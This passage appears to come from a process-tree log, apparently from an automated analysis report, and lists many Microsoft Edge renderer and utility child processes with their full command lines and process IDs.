C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6244,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:14⤵PID:2568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6168,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6192 /prefetch:14⤵PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=3444,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6156 /prefetch:14⤵PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6496,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=4372 /prefetch:14⤵PID:2668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=5932,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6148 /prefetch:14⤵PID:4800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=6452,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6112 /prefetch:14⤵PID:3384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6596,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6092 /prefetch:14⤵PID:1156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=6580,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6900 /prefetch:14⤵PID:1408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7060,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6792 /prefetch:14⤵PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=7112,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7160 /prefetch:14⤵PID:2852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=6940,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:14⤵PID:5060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=3988,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7176 /prefetch:14⤵PID:3756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6448,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:84⤵PID:648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7160,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7300 /prefetch:84⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7136,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6380 /prefetch:84⤵PID:3536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=5272,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:14⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=2756,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6676 /prefetch:14⤵PID:5280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=5240,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:14⤵PID:1416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=7380,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7372 /prefetch:14⤵PID:6136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=7132,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7176 /prefetch:14⤵PID:1228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7624,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7708 /prefetch:14⤵PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7452,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7424 /prefetch:14⤵PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=7888,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7908 /prefetch:14⤵PID:2948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=8048,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=8064 /prefetch:14⤵PID:876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=7640,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7768 /prefetch:14⤵PID:2900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=8308,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=8328 /prefetch:14⤵PID:1736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=8244,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7968 /prefetch:14⤵PID:5744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=7172,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7628 /prefetch:14⤵PID:4280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=8292,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=8420 /prefetch:14⤵PID:5616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7660,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7944 /prefetch:84⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=5808,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=5840 /prefetch:14⤵PID:5940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=8900,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=8976 /prefetch:14⤵PID:1368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=8864,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=8860 /prefetch:14⤵PID:6164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=8556,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=8496 /prefetch:14⤵PID:6248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9036,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=8520 /prefetch:84⤵PID:6396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=9028,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=8936 /prefetch:14⤵PID:6512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=8912,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9372 /prefetch:14⤵PID:6636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=9020,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9384 /prefetch:14⤵PID:6860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=9600,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9556 /prefetch:14⤵PID:6964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=9508,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=8856 /prefetch:14⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=8980,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9512 /prefetch:14⤵PID:6328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9452,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9240 /prefetch:84⤵PID:5516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=8168,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=7764 /prefetch:14⤵PID:6596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=9924,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9948 /prefetch:14⤵PID:6752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=9928,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=840 /prefetch:14⤵PID:4516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=9388,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9972 /prefetch:14⤵PID:6876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=9756,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9960 /prefetch:14⤵PID:6852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=10196,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=10160 /prefetch:14⤵PID:3632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=9952,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9424 /prefetch:14⤵PID:6424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=10316,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=10324 /prefetch:14⤵PID:6660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=9652,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=9668 /prefetch:14⤵PID:3100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=10492,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=10560 /prefetch:14⤵PID:6796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10168,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=10692 /prefetch:84⤵PID:6720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=10372,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=10720 /prefetch:14⤵PID:6976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=10712,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=10964 /prefetch:14⤵PID:6464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=10560,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=10576 /prefetch:14⤵PID:3912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=10928,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11000 /prefetch:14⤵PID:744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=10984,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=11188 /prefetch:14⤵PID:6008
-
-
